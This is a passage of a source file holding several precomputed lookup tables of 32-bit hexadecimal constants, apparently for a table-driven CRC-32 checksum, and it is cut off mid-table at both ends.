0x25290964, 0x8b4198f5, 0xa2892c07, 0x0ce1bd96, 0x820bdaac, 0x2c634b3d, 0x05abffcf, 0xabc36e5e, 0x563a962b, 0xf85207ba, 0xd19ab348, 0x7ff222d9, 0x2e7ef6fa, 0x8016676b, 0xa9ded399, 0x07b64208, 0xfa4fba7d, 0x54272bec, 0x7def9f1e, 0xd3870e8f, 0x5d6d69b5, 0xf305f824, 0xdacd4cd6, 0x74a5dd47, 0x895c2532, 0x2734b4a3, 0x0efc0051, 0xa09491c0, 0xc859c864, 0x663159f5, 0x4ff9ed07, 0xe1917c96, 0x1c6884e3, 0xb2001572, 0x9bc8a180, 0x35a03011, 0xbb4a572b, 0x1522c6ba, 0x3cea7248, 0x9282e3d9, 0x6f7b1bac, 0xc1138a3d, 0xe8db3ecf, 0x46b3af5e, 0x39418d87, 0x97291c16, 0xbee1a8e4, 0x10893975, 0xed70c100, 0x43185091, 0x6ad0e463, 0xc4b875f2, 0x4a5212c8, 0xe43a8359, 0xcdf237ab, 0x639aa63a, 0x9e635e4f, 0x300bcfde, 0x19c37b2c, 0xb7abeabd, 0xdf66b319, 0x710e2288, 0x58c6967a, 0xf6ae07eb, 0x0b57ff9e, 0xa53f6e0f, 0x8cf7dafd, 0x229f4b6c, 0xac752c56, 0x021dbdc7, 0x2bd50935, 0x85bd98a4, 0x784460d1, 
0xd62cf140, 0xffe445b2, 0x518cd423, 0x5cfdedf4, 0xf2957c65, 0xdb5dc897, 0x75355906, 0x88cca173, 0x26a430e2, 0x0f6c8410, 0xa1041581, 0x2fee72bb, 0x8186e32a, 0xa84e57d8, 0x0626c649, 0xfbdf3e3c, 0x55b7afad, 0x7c7f1b5f, 0xd2178ace, 0xbadad36a, 0x14b242fb, 0x3d7af609, 0x93126798, 0x6eeb9fed, 0xc0830e7c, 0xe94bba8e, 0x47232b1f, 0xc9c94c25, 0x67a1ddb4, 0x4e696946, 0xe001f8d7, 0x1df800a2, 0xb3909133, 0x9a5825c1, 0x3430b450, 0x4bc29689, 0xe5aa0718, 0xcc62b3ea, 0x620a227b, 0x9ff3da0e, 0x319b4b9f, 0x1853ff6d, 0xb63b6efc, 0x38d109c6, 0x96b99857, 0xbf712ca5, 0x1119bd34, 0xece04541, 0x4288d4d0, 0x6b406022, 0xc528f1b3, 0xade5a817, 0x038d3986, 0x2a458d74, 0x842d1ce5, 0x79d4e490, 0xd7bc7501, 0xfe74c1f3, 0x501c5062, 0xdef63758, 0x709ea6c9, 0x5956123b, 0xf73e83aa, 0x0ac77bdf, 0xa4afea4e, 0x8d675ebc, 0x230fcf2d, 0x72831b0e, 0xdceb8a9f, 0xf5233e6d, 0x5b4baffc, 0xa6b25789, 0x08dac618, 0x211272ea, 0x8f7ae37b, 0x01908441, 0xaff815d0, 0x8630a122, 0x285830b3, 0xd5a1c8c6, 0x7bc95957, 0x5201eda5, 0xfc697c34, 0x94a42590, 0x3accb401, 0x130400f3, 0xbd6c9162, 0x40956917, 0xeefdf886, 0xc7354c74, 0x695ddde5, 0xe7b7badf, 0x49df2b4e, 0x60179fbc, 0xce7f0e2d, 0x3386f658, 0x9dee67c9, 0xb426d33b, 0x1a4e42aa, 0x65bc6073, 0xcbd4f1e2, 0xe21c4510, 0x4c74d481, 0xb18d2cf4, 0x1fe5bd65, 0x362d0997, 0x98459806, 0x16afff3c, 0xb8c76ead, 0x910fda5f, 0x3f674bce, 0xc29eb3bb, 0x6cf6222a, 0x453e96d8, 0xeb560749, 0x839b5eed, 0x2df3cf7c, 0x043b7b8e, 0xaa53ea1f, 0x57aa126a, 0xf9c283fb, 0xd00a3709, 0x7e62a698, 0xf088c1a2, 0x5ee05033, 0x7728e4c1, 0xd9407550, 0x24b98d25, 0x8ad11cb4, 0xa319a846, 0x0d7139d7}, {0x00000000, 0xb9fbdbe8, 0xa886b191, 0x117d6a79, 0x8a7c6563, 0x3387be8b, 0x22fad4f2, 0x9b010f1a, 0xcf89cc87, 0x7672176f, 0x670f7d16, 0xdef4a6fe, 0x45f5a9e4, 0xfc0e720c, 0xed731875, 0x5488c39d, 0x44629f4f, 0xfd9944a7, 0xece42ede, 0x551ff536, 0xce1efa2c, 0x77e521c4, 0x66984bbd, 0xdf639055, 0x8beb53c8, 0x32108820, 0x236de259, 0x9a9639b1, 0x019736ab, 0xb86ced43, 0xa911873a, 0x10ea5cd2, 0x88c53e9e, 0x313ee576, 0x20438f0f, 
0x99b854e7, 0x02b95bfd, 0xbb428015, 0xaa3fea6c, 0x13c43184, 0x474cf219, 0xfeb729f1, 0xefca4388, 0x56319860, 0xcd30977a, 0x74cb4c92, 0x65b626eb, 0xdc4dfd03, 0xcca7a1d1, 0x755c7a39, 0x64211040, 0xdddacba8, 0x46dbc4b2, 0xff201f5a, 0xee5d7523, 0x57a6aecb, 0x032e6d56, 0xbad5b6be, 0xaba8dcc7, 0x1253072f, 0x89520835, 0x30a9d3dd, 0x21d4b9a4, 0x982f624c, 0xcafb7b7d, 0x7300a095, 0x627dcaec, 0xdb861104, 0x40871e1e, 0xf97cc5f6, 0xe801af8f, 0x51fa7467, 0x0572b7fa, 0xbc896c12, 0xadf4066b, 0x140fdd83, 0x8f0ed299, 0x36f50971, 0x27886308, 0x9e73b8e0, 0x8e99e432, 0x37623fda, 0x261f55a3, 0x9fe48e4b, 0x04e58151, 0xbd1e5ab9, 0xac6330c0, 0x1598eb28, 0x411028b5, 0xf8ebf35d, 0xe9969924, 0x506d42cc, 0xcb6c4dd6, 0x7297963e, 0x63eafc47, 0xda1127af, 0x423e45e3, 0xfbc59e0b, 0xeab8f472, 0x53432f9a, 0xc8422080, 0x71b9fb68, 0x60c49111, 0xd93f4af9, 0x8db78964, 0x344c528c, 0x253138f5, 0x9ccae31d, 0x07cbec07, 0xbe3037ef, 0xaf4d5d96, 0x16b6867e, 0x065cdaac, 0xbfa70144, 0xaeda6b3d, 0x1721b0d5, 0x8c20bfcf, 0x35db6427, 0x24a60e5e, 0x9d5dd5b6, 0xc9d5162b, 0x702ecdc3, 0x6153a7ba, 0xd8a87c52, 0x43a97348, 0xfa52a8a0, 0xeb2fc2d9, 0x52d41931, 0x4e87f0bb, 0xf77c2b53, 0xe601412a, 0x5ffa9ac2, 0xc4fb95d8, 0x7d004e30, 0x6c7d2449, 0xd586ffa1, 0x810e3c3c, 0x38f5e7d4, 0x29888dad, 0x90735645, 0x0b72595f, 0xb28982b7, 0xa3f4e8ce, 0x1a0f3326, 0x0ae56ff4, 0xb31eb41c, 0xa263de65, 0x1b98058d, 0x80990a97, 0x3962d17f, 0x281fbb06, 0x91e460ee, 0xc56ca373, 0x7c97789b, 0x6dea12e2, 0xd411c90a, 0x4f10c610, 0xf6eb1df8, 0xe7967781, 0x5e6dac69, 0xc642ce25, 0x7fb915cd, 0x6ec47fb4, 0xd73fa45c, 0x4c3eab46, 0xf5c570ae, 0xe4b81ad7, 0x5d43c13f, 0x09cb02a2, 0xb030d94a, 0xa14db333, 0x18b668db, 0x83b767c1, 0x3a4cbc29, 0x2b31d650, 0x92ca0db8, 0x8220516a, 0x3bdb8a82, 0x2aa6e0fb, 0x935d3b13, 0x085c3409, 0xb1a7efe1, 0xa0da8598, 0x19215e70, 0x4da99ded, 0xf4524605, 0xe52f2c7c, 0x5cd4f794, 0xc7d5f88e, 0x7e2e2366, 0x6f53491f, 0xd6a892f7, 0x847c8bc6, 0x3d87502e, 0x2cfa3a57, 0x9501e1bf, 0x0e00eea5, 0xb7fb354d, 0xa6865f34, 0x1f7d84dc, 0x4bf54741, 
0xf20e9ca9, 0xe373f6d0, 0x5a882d38, 0xc1892222, 0x7872f9ca, 0x690f93b3, 0xd0f4485b, 0xc01e1489, 0x79e5cf61, 0x6898a518, 0xd1637ef0, 0x4a6271ea, 0xf399aa02, 0xe2e4c07b, 0x5b1f1b93, 0x0f97d80e, 0xb66c03e6, 0xa711699f, 0x1eeab277, 0x85ebbd6d, 0x3c106685, 0x2d6d0cfc, 0x9496d714, 0x0cb9b558, 0xb5426eb0, 0xa43f04c9, 0x1dc4df21, 0x86c5d03b, 0x3f3e0bd3, 0x2e4361aa, 0x97b8ba42, 0xc33079df, 0x7acba237, 0x6bb6c84e, 0xd24d13a6, 0x494c1cbc, 0xf0b7c754, 0xe1caad2d, 0x583176c5, 0x48db2a17, 0xf120f1ff, 0xe05d9b86, 0x59a6406e, 0xc2a74f74, 0x7b5c949c, 0x6a21fee5, 0xd3da250d, 0x8752e690, 0x3ea93d78, 0x2fd45701, 0x962f8ce9, 0x0d2e83f3, 0xb4d5581b, 0xa5a83262, 0x1c53e98a}, {0x00000000, 0x9d0fe176, 0xe16ec4ad, 0x7c6125db, 0x19ac8f1b, 0x84a36e6d, 0xf8c24bb6, 0x65cdaac0, 0x33591e36, 0xae56ff40, 0xd237da9b, 0x4f383bed, 0x2af5912d, 0xb7fa705b, 0xcb9b5580, 0x5694b4f6, 0x66b23c6c, 0xfbbddd1a, 0x87dcf8c1, 0x1ad319b7, 0x7f1eb377, 0xe2115201, 0x9e7077da, 0x037f96ac, 0x55eb225a, 0xc8e4c32c, 0xb485e6f7, 0x298a0781, 0x4c47ad41, 0xd1484c37, 0xad2969ec, 0x3026889a, 0xcd6478d8, 0x506b99ae, 0x2c0abc75, 0xb1055d03, 0xd4c8f7c3, 0x49c716b5, 0x35a6336e, 0xa8a9d218, 0xfe3d66ee, 0x63328798, 0x1f53a243, 0x825c4335, 0xe791e9f5, 0x7a9e0883, 0x06ff2d58, 0x9bf0cc2e, 0xabd644b4, 0x36d9a5c2, 0x4ab88019, 0xd7b7616f, 0xb27acbaf, 0x2f752ad9, 0x53140f02, 0xce1bee74, 0x988f5a82, 0x0580bbf4, 0x79e19e2f, 0xe4ee7f59, 0x8123d599, 0x1c2c34ef, 0x604d1134, 0xfd42f042, 0x41b9f7f1, 0xdcb61687, 0xa0d7335c, 0x3dd8d22a, 0x581578ea, 0xc51a999c, 0xb97bbc47, 0x24745d31, 0x72e0e9c7, 0xefef08b1, 0x938e2d6a, 0x0e81cc1c, 0x6b4c66dc, 0xf64387aa, 0x8a22a271, 0x172d4307, 0x270bcb9d, 0xba042aeb, 0xc6650f30, 0x5b6aee46, 0x3ea74486, 0xa3a8a5f0, 0xdfc9802b, 0x42c6615d, 0x1452d5ab, 0x895d34dd, 0xf53c1106, 0x6833f070, 0x0dfe5ab0, 0x90f1bbc6, 0xec909e1d, 0x719f7f6b, 0x8cdd8f29, 0x11d26e5f, 0x6db34b84, 0xf0bcaaf2, 0x95710032, 0x087ee144, 0x741fc49f, 0xe91025e9, 0xbf84911f, 0x228b7069, 0x5eea55b2, 0xc3e5b4c4, 0xa6281e04, 0x3b27ff72, 0x4746daa9, 
0xda493bdf, 0xea6fb345, 0x77605233, 0x0b0177e8, 0x960e969e, 0xf3c33c5e, 0x6eccdd28, 0x12adf8f3, 0x8fa21985, 0xd936ad73, 0x44394c05, 0x385869de, 0xa55788a8, 0xc09a2268, 0x5d95c31e, 0x21f4e6c5, 0xbcfb07b3, 0x8373efe2, 0x1e7c0e94, 0x621d2b4f, 0xff12ca39, 0x9adf60f9, 0x07d0818f, 0x7bb1a454, 0xe6be4522, 0xb02af1d4, 0x2d2510a2, 0x51443579, 0xcc4bd40f, 0xa9867ecf, 0x34899fb9, 0x48e8ba62, 0xd5e75b14, 0xe5c1d38e, 0x78ce32f8, 0x04af1723, 0x99a0f655, 0xfc6d5c95, 0x6162bde3, 0x1d039838, 0x800c794e, 0xd698cdb8, 0x4b972cce, 0x37f60915, 0xaaf9e863, 0xcf3442a3, 0x523ba3d5, 0x2e5a860e, 0xb3556778, 0x4e17973a, 0xd318764c, 0xaf795397, 0x3276b2e1, 0x57bb1821, 0xcab4f957, 0xb6d5dc8c, 0x2bda3dfa, 0x7d4e890c, 0xe041687a, 0x9c204da1, 0x012facd7, 0x64e20617, 0xf9ede761, 0x858cc2ba, 0x188323cc, 0x28a5ab56, 0xb5aa4a20, 0xc9cb6ffb, 0x54c48e8d, 0x3109244d, 0xac06c53b, 0xd067e0e0, 0x4d680196, 0x1bfcb560, 0x86f35416, 0xfa9271cd, 0x679d90bb, 0x02503a7b, 0x9f5fdb0d, 0xe33efed6, 0x7e311fa0, 0xc2ca1813, 0x5fc5f965, 0x23a4dcbe, 0xbeab3dc8, 0xdb669708, 0x4669767e, 0x3a0853a5, 0xa707b2d3, 0xf1930625, 0x6c9ce753, 0x10fdc288, 0x8df223fe, 0xe83f893e, 0x75306848, 0x09514d93, 0x945eace5, 0xa478247f, 0x3977c509, 0x4516e0d2, 0xd81901a4, 0xbdd4ab64, 0x20db4a12, 0x5cba6fc9, 0xc1b58ebf, 0x97213a49, 0x0a2edb3f, 0x764ffee4, 0xeb401f92, 0x8e8db552, 0x13825424, 0x6fe371ff, 0xf2ec9089, 0x0fae60cb, 0x92a181bd, 0xeec0a466, 0x73cf4510, 0x1602efd0, 0x8b0d0ea6, 0xf76c2b7d, 0x6a63ca0b, 0x3cf77efd, 0xa1f89f8b, 0xdd99ba50, 0x40965b26, 0x255bf1e6, 0xb8541090, 0xc435354b, 0x593ad43d, 0x691c5ca7, 0xf413bdd1, 0x8872980a, 0x157d797c, 0x70b0d3bc, 0xedbf32ca, 0x91de1711, 0x0cd1f667, 0x5a454291, 0xc74aa3e7, 0xbb2b863c, 0x2624674a, 0x43e9cd8a, 0xdee62cfc, 0xa2870927, 0x3f88e851}, {0x00000000, 0xdd96d985, 0x605cb54b, 0xbdca6cce, 0xc0b96a96, 0x1d2fb313, 0xa0e5dfdd, 0x7d730658, 0x5a03d36d, 0x87950ae8, 0x3a5f6626, 0xe7c9bfa3, 0x9abab9fb, 0x472c607e, 0xfae60cb0, 0x2770d535, 0xb407a6da, 0x69917f5f, 0xd45b1391, 0x09cdca14, 0x74becc4c, 
0xa92815c9, 0x14e27907, 0xc974a082, 0xee0475b7, 0x3392ac32, 0x8e58c0fc, 0x53ce1979, 0x2ebd1f21, 0xf32bc6a4, 0x4ee1aa6a, 0x937773ef, 0xb37e4bf5, 0x6ee89270, 0xd322febe, 0x0eb4273b, 0x73c72163, 0xae51f8e6, 0x139b9428, 0xce0d4dad, 0xe97d9898, 0x34eb411d, 0x89212dd3, 0x54b7f456, 0x29c4f20e, 0xf4522b8b, 0x49984745, 0x940e9ec0, 0x0779ed2f, 0xdaef34aa, 0x67255864, 0xbab381e1, 0xc7c087b9, 0x1a565e3c, 0xa79c32f2, 0x7a0aeb77, 0x5d7a3e42, 0x80ece7c7, 0x3d268b09, 0xe0b0528c, 0x9dc354d4, 0x40558d51, 0xfd9fe19f, 0x2009381a, 0xbd8d91ab, 0x601b482e, 0xddd124e0, 0x0047fd65, 0x7d34fb3d, 0xa0a222b8, 0x1d684e76, 0xc0fe97f3, 0xe78e42c6, 0x3a189b43, 0x87d2f78d, 0x5a442e08, 0x27372850, 0xfaa1f1d5, 0x476b9d1b, 0x9afd449e, 0x098a3771, 0xd41ceef4, 0x69d6823a, 0xb4405bbf, 0xc9335de7, 0x14a58462, 0xa96fe8ac, 0x74f93129, 0x5389e41c, 0x8e1f3d99, 0x33d55157, 0xee4388d2, 0x93308e8a, 0x4ea6570f, 0xf36c3bc1, 0x2efae244, 0x0ef3da5e, 0xd36503db, 0x6eaf6f15, 0xb339b690, 0xce4ab0c8, 0x13dc694d, 0xae160583, 0x7380dc06, 0x54f00933, 0x8966d0b6, 0x34acbc78, 0xe93a65fd, 0x944963a5, 0x49dfba20, 0xf415d6ee, 0x29830f6b, 0xbaf47c84, 0x6762a501, 0xdaa8c9cf, 0x073e104a, 0x7a4d1612, 0xa7dbcf97, 0x1a11a359, 0xc7877adc, 0xe0f7afe9, 0x3d61766c, 0x80ab1aa2, 0x5d3dc327, 0x204ec57f, 0xfdd81cfa, 0x40127034, 0x9d84a9b1, 0xa06a2517, 0x7dfcfc92, 0xc036905c, 0x1da049d9, 0x60d34f81, 0xbd459604, 0x008ffaca, 0xdd19234f, 0xfa69f67a, 0x27ff2fff, 0x9a354331, 0x47a39ab4, 0x3ad09cec, 0xe7464569, 0x5a8c29a7, 0x871af022, 0x146d83cd, 0xc9fb5a48, 0x74313686, 0xa9a7ef03, 0xd4d4e95b, 0x094230de, 0xb4885c10, 0x691e8595, 0x4e6e50a0, 0x93f88925, 0x2e32e5eb, 0xf3a43c6e, 0x8ed73a36, 0x5341e3b3, 0xee8b8f7d, 0x331d56f8, 0x13146ee2, 0xce82b767, 0x7348dba9, 0xaede022c, 0xd3ad0474, 0x0e3bddf1, 0xb3f1b13f, 0x6e6768ba, 0x4917bd8f, 0x9481640a, 0x294b08c4, 0xf4ddd141, 0x89aed719, 0x54380e9c, 0xe9f26252, 0x3464bbd7, 0xa713c838, 0x7a8511bd, 0xc74f7d73, 0x1ad9a4f6, 0x67aaa2ae, 0xba3c7b2b, 0x07f617e5, 0xda60ce60, 0xfd101b55, 0x2086c2d0, 0x9d4cae1e, 
0x40da779b, 0x3da971c3, 0xe03fa846, 0x5df5c488, 0x80631d0d, 0x1de7b4bc, 0xc0716d39, 0x7dbb01f7, 0xa02dd872, 0xdd5ede2a, 0x00c807af, 0xbd026b61, 0x6094b2e4, 0x47e467d1, 0x9a72be54, 0x27b8d29a, 0xfa2e0b1f, 0x875d0d47, 0x5acbd4c2, 0xe701b80c, 0x3a976189, 0xa9e01266, 0x7476cbe3, 0xc9bca72d, 0x142a7ea8, 0x695978f0, 0xb4cfa175, 0x0905cdbb, 0xd493143e, 0xf3e3c10b, 0x2e75188e, 0x93bf7440, 0x4e29adc5, 0x335aab9d, 0xeecc7218, 0x53061ed6, 0x8e90c753, 0xae99ff49, 0x730f26cc, 0xcec54a02, 0x13539387, 0x6e2095df, 0xb3b64c5a, 0x0e7c2094, 0xd3eaf911, 0xf49a2c24, 0x290cf5a1, 0x94c6996f, 0x495040ea, 0x342346b2, 0xe9b59f37, 0x547ff3f9, 0x89e92a7c, 0x1a9e5993, 0xc7088016, 0x7ac2ecd8, 0xa754355d, 0xda273305, 0x07b1ea80, 0xba7b864e, 0x67ed5fcb, 0x409d8afe, 0x9d0b537b, 0x20c13fb5, 0xfd57e630, 0x8024e068, 0x5db239ed, 0xe0785523, 0x3dee8ca6}, {0x00000000, 0x9ba54c6f, 0xec3b9e9f, 0x779ed2f0, 0x03063b7f, 0x98a37710, 0xef3da5e0, 0x7498e98f, 0x060c76fe, 0x9da93a91, 0xea37e861, 0x7192a40e, 0x050a4d81, 0x9eaf01ee, 0xe931d31e, 0x72949f71, 0x0c18edfc, 0x97bda193, 0xe0237363, 0x7b863f0c, 0x0f1ed683, 0x94bb9aec, 0xe325481c, 0x78800473, 0x0a149b02, 0x91b1d76d, 0xe62f059d, 0x7d8a49f2, 0x0912a07d, 0x92b7ec12, 0xe5293ee2, 0x7e8c728d, 0x1831dbf8, 0x83949797, 0xf40a4567, 0x6faf0908, 0x1b37e087, 0x8092ace8, 0xf70c7e18, 0x6ca93277, 0x1e3dad06, 0x8598e169, 0xf2063399, 0x69a37ff6, 0x1d3b9679, 0x869eda16, 0xf10008e6, 0x6aa54489, 0x14293604, 0x8f8c7a6b, 0xf812a89b, 0x63b7e4f4, 0x172f0d7b, 0x8c8a4114, 0xfb1493e4, 0x60b1df8b, 0x122540fa, 0x89800c95, 0xfe1ede65, 0x65bb920a, 0x11237b85, 0x8a8637ea, 0xfd18e51a, 0x66bda975, 0x3063b7f0, 0xabc6fb9f, 0xdc58296f, 0x47fd6500, 0x33658c8f, 0xa8c0c0e0, 0xdf5e1210, 0x44fb5e7f, 0x366fc10e, 0xadca8d61, 0xda545f91, 0x41f113fe, 0x3569fa71, 0xaeccb61e, 0xd95264ee, 0x42f72881, 0x3c7b5a0c, 0xa7de1663, 0xd040c493, 0x4be588fc, 0x3f7d6173, 0xa4d82d1c, 0xd346ffec, 0x48e3b383, 0x3a772cf2, 0xa1d2609d, 0xd64cb26d, 0x4de9fe02, 0x3971178d, 0xa2d45be2, 0xd54a8912, 0x4eefc57d, 0x28526c08, 
0xb3f72067, 0xc469f297, 0x5fccbef8, 0x2b545777, 0xb0f11b18, 0xc76fc9e8, 0x5cca8587, 0x2e5e1af6, 0xb5fb5699, 0xc2658469, 0x59c0c806, 0x2d582189, 0xb6fd6de6, 0xc163bf16, 0x5ac6f379, 0x244a81f4, 0xbfefcd9b, 0xc8711f6b, 0x53d45304, 0x274cba8b, 0xbce9f6e4, 0xcb772414, 0x50d2687b, 0x2246f70a, 0xb9e3bb65, 0xce7d6995, 0x55d825fa, 0x2140cc75, 0xbae5801a, 0xcd7b52ea, 0x56de1e85, 0x60c76fe0, 0xfb62238f, 0x8cfcf17f, 0x1759bd10, 0x63c1549f, 0xf86418f0, 0x8ffaca00, 0x145f866f, 0x66cb191e, 0xfd6e5571, 0x8af08781, 0x1155cbee, 0x65cd2261, 0xfe686e0e, 0x89f6bcfe, 0x1253f091, 0x6cdf821c, 0xf77ace73, 0x80e41c83, 0x1b4150ec, 0x6fd9b963, 0xf47cf50c, 0x83e227fc, 0x18476b93, 0x6ad3f4e2, 0xf176b88d, 0x86e86a7d, 0x1d4d2612, 0x69d5cf9d, 0xf27083f2, 0x85ee5102, 0x1e4b1d6d, 0x78f6b418, 0xe353f877, 0x94cd2a87, 0x0f6866e8, 0x7bf08f67, 0xe055c308, 0x97cb11f8, 0x0c6e5d97, 0x7efac2e6, 0xe55f8e89, 0x92c15c79, 0x09641016, 0x7dfcf999, 0xe659b5f6, 0x91c76706, 0x0a622b69, 0x74ee59e4, 0xef4b158b, 0x98d5c77b, 0x03708b14, 0x77e8629b, 0xec4d2ef4, 0x9bd3fc04, 0x0076b06b, 0x72e22f1a, 0xe9476375, 0x9ed9b185, 0x057cfdea, 0x71e41465, 0xea41580a, 0x9ddf8afa, 0x067ac695, 0x50a4d810, 0xcb01947f, 0xbc9f468f, 0x273a0ae0, 0x53a2e36f, 0xc807af00, 0xbf997df0, 0x243c319f, 0x56a8aeee, 0xcd0de281, 0xba933071, 0x21367c1e, 0x55ae9591, 0xce0bd9fe, 0xb9950b0e, 0x22304761, 0x5cbc35ec, 0xc7197983, 0xb087ab73, 0x2b22e71c, 0x5fba0e93, 0xc41f42fc, 0xb381900c, 0x2824dc63, 0x5ab04312, 0xc1150f7d, 0xb68bdd8d, 0x2d2e91e2, 0x59b6786d, 0xc2133402, 0xb58de6f2, 0x2e28aa9d, 0x489503e8, 0xd3304f87, 0xa4ae9d77, 0x3f0bd118, 0x4b933897, 0xd03674f8, 0xa7a8a608, 0x3c0dea67, 0x4e997516, 0xd53c3979, 0xa2a2eb89, 0x3907a7e6, 0x4d9f4e69, 0xd63a0206, 0xa1a4d0f6, 0x3a019c99, 0x448dee14, 0xdf28a27b, 0xa8b6708b, 0x33133ce4, 0x478bd56b, 0xdc2e9904, 0xabb04bf4, 0x3015079b, 0x428198ea, 0xd924d485, 0xaeba0675, 0x351f4a1a, 0x4187a395, 0xda22effa, 0xadbc3d0a, 0x36197165}, {0x00000000, 0xc18edfc0, 0x586cb9c1, 0x99e26601, 0xb0d97382, 0x7157ac42, 0xe8b5ca43, 
0x293b1583, 0xbac3e145, 0x7b4d3e85, 0xe2af5884, 0x23218744, 0x0a1a92c7, 0xcb944d07, 0x52762b06, 0x93f8f4c6, 0xaef6c4cb, 0x6f781b0b, 0xf69a7d0a, 0x3714a2ca, 0x1e2fb749, 0xdfa16889, 0x46430e88, 0x87cdd148, 0x1435258e, 0xd5bbfa4e, 0x4c599c4f, 0x8dd7438f, 0xa4ec560c, 0x656289cc, 0xfc80efcd, 0x3d0e300d, 0x869c8fd7, 0x47125017, 0xdef03616, 0x1f7ee9d6, 0x3645fc55, 0xf7cb2395, 0x6e294594, 0xafa79a54, 0x3c5f6e92, 0xfdd1b152, 0x6433d753, 0xa5bd0893, 0x8c861d10, 0x4d08c2d0, 0xd4eaa4d1, 0x15647b11, 0x286a4b1c, 0xe9e494dc, 0x7006f2dd, 0xb1882d1d, 0x98b3389e, 0x593de75e, 0xc0df815f, 0x01515e9f, 0x92a9aa59, 0x53277599, 0xcac51398, 0x0b4bcc58, 0x2270d9db, 0xe3fe061b, 0x7a1c601a, 0xbb92bfda, 0xd64819ef, 0x17c6c62f, 0x8e24a02e, 0x4faa7fee, 0x66916a6d, 0xa71fb5ad, 0x3efdd3ac, 0xff730c6c, 0x6c8bf8aa, 0xad05276a, 0x34e7416b, 0xf5699eab, 0xdc528b28, 0x1ddc54e8, 0x843e32e9, 0x45b0ed29, 0x78bedd24, 0xb93002e4, 0x20d264e5, 0xe15cbb25, 0xc867aea6, 0x09e97166, 0x900b1767, 0x5185c8a7, 0xc27d3c61, 0x03f3e3a1, 0x9a1185a0, 0x5b9f5a60, 0x72a44fe3, 0xb32a9023, 0x2ac8f622, 0xeb4629e2, 0x50d49638, 0x915a49f8, 0x08b82ff9, 0xc936f039, 0xe00de5ba, 0x21833a7a, 0xb8615c7b, 0x79ef83bb, 0xea17777d, 0x2b99a8bd, 0xb27bcebc, 0x73f5117c, 0x5ace04ff, 0x9b40db3f, 0x02a2bd3e, 0xc32c62fe, 0xfe2252f3, 0x3fac8d33, 0xa64eeb32, 0x67c034f2, 0x4efb2171, 0x8f75feb1, 0x169798b0, 0xd7194770, 0x44e1b3b6, 0x856f6c76, 0x1c8d0a77, 0xdd03d5b7, 0xf438c034, 0x35b61ff4, 0xac5479f5, 0x6ddaa635, 0x77e1359f, 0xb66fea5f, 0x2f8d8c5e, 0xee03539e, 0xc738461d, 0x06b699dd, 0x9f54ffdc, 0x5eda201c, 0xcd22d4da, 0x0cac0b1a, 0x954e6d1b, 0x54c0b2db, 0x7dfba758, 0xbc757898, 0x25971e99, 0xe419c159, 0xd917f154, 0x18992e94, 0x817b4895, 0x40f59755, 0x69ce82d6, 0xa8405d16, 0x31a23b17, 0xf02ce4d7, 0x63d41011, 0xa25acfd1, 0x3bb8a9d0, 0xfa367610, 0xd30d6393, 0x1283bc53, 0x8b61da52, 0x4aef0592, 0xf17dba48, 0x30f36588, 0xa9110389, 0x689fdc49, 0x41a4c9ca, 0x802a160a, 0x19c8700b, 0xd846afcb, 0x4bbe5b0d, 0x8a3084cd, 0x13d2e2cc, 0xd25c3d0c, 0xfb67288f, 
0x3ae9f74f, 0xa30b914e, 0x62854e8e, 0x5f8b7e83, 0x9e05a143, 0x07e7c742, 0xc6691882, 0xef520d01, 0x2edcd2c1, 0xb73eb4c0, 0x76b06b00, 0xe5489fc6, 0x24c64006, 0xbd242607, 0x7caaf9c7, 0x5591ec44, 0x941f3384, 0x0dfd5585, 0xcc738a45, 0xa1a92c70, 0x6027f3b0, 0xf9c595b1, 0x384b4a71, 0x11705ff2, 0xd0fe8032, 0x491ce633, 0x889239f3, 0x1b6acd35, 0xdae412f5, 0x430674f4, 0x8288ab34, 0xabb3beb7, 0x6a3d6177, 0xf3df0776, 0x3251d8b6, 0x0f5fe8bb, 0xced1377b, 0x5733517a, 0x96bd8eba, 0xbf869b39, 0x7e0844f9, 0xe7ea22f8, 0x2664fd38, 0xb59c09fe, 0x7412d63e, 0xedf0b03f, 0x2c7e6fff, 0x05457a7c, 0xc4cba5bc, 0x5d29c3bd, 0x9ca71c7d, 0x2735a3a7, 0xe6bb7c67, 0x7f591a66, 0xbed7c5a6, 0x97ecd025, 0x56620fe5, 0xcf8069e4, 0x0e0eb624, 0x9df642e2, 0x5c789d22, 0xc59afb23, 0x041424e3, 0x2d2f3160, 0xeca1eea0, 0x754388a1, 0xb4cd5761, 0x89c3676c, 0x484db8ac, 0xd1afdead, 0x1021016d, 0x391a14ee, 0xf894cb2e, 0x6176ad2f, 0xa0f872ef, 0x33008629, 0xf28e59e9, 0x6b6c3fe8, 0xaae2e028, 0x83d9f5ab, 0x42572a6b, 0xdbb54c6a, 0x1a3b93aa}, {0x00000000, 0xefc26b3e, 0x04f5d03d, 0xeb37bb03, 0x09eba07a, 0xe629cb44, 0x0d1e7047, 0xe2dc1b79, 0x13d740f4, 0xfc152bca, 0x172290c9, 0xf8e0fbf7, 0x1a3ce08e, 0xf5fe8bb0, 0x1ec930b3, 0xf10b5b8d, 0x27ae81e8, 0xc86cead6, 0x235b51d5, 0xcc993aeb, 0x2e452192, 0xc1874aac, 0x2ab0f1af, 0xc5729a91, 0x3479c11c, 0xdbbbaa22, 0x308c1121, 0xdf4e7a1f, 0x3d926166, 0xd2500a58, 0x3967b15b, 0xd6a5da65, 0x4f5d03d0, 0xa09f68ee, 0x4ba8d3ed, 0xa46ab8d3, 0x46b6a3aa, 0xa974c894, 0x42437397, 0xad8118a9, 0x5c8a4324, 0xb348281a, 0x587f9319, 0xb7bdf827, 0x5561e35e, 0xbaa38860, 0x51943363, 0xbe56585d, 0x68f38238, 0x8731e906, 0x6c065205, 0x83c4393b, 0x61182242, 0x8eda497c, 0x65edf27f, 0x8a2f9941, 0x7b24c2cc, 0x94e6a9f2, 0x7fd112f1, 0x901379cf, 0x72cf62b6, 0x9d0d0988, 0x763ab28b, 0x99f8d9b5, 0x9eba07a0, 0x71786c9e, 0x9a4fd79d, 0x758dbca3, 0x9751a7da, 0x7893cce4, 0x93a477e7, 0x7c661cd9, 0x8d6d4754, 0x62af2c6a, 0x89989769, 0x665afc57, 0x8486e72e, 0x6b448c10, 0x80733713, 0x6fb15c2d, 0xb9148648, 0x56d6ed76, 0xbde15675, 
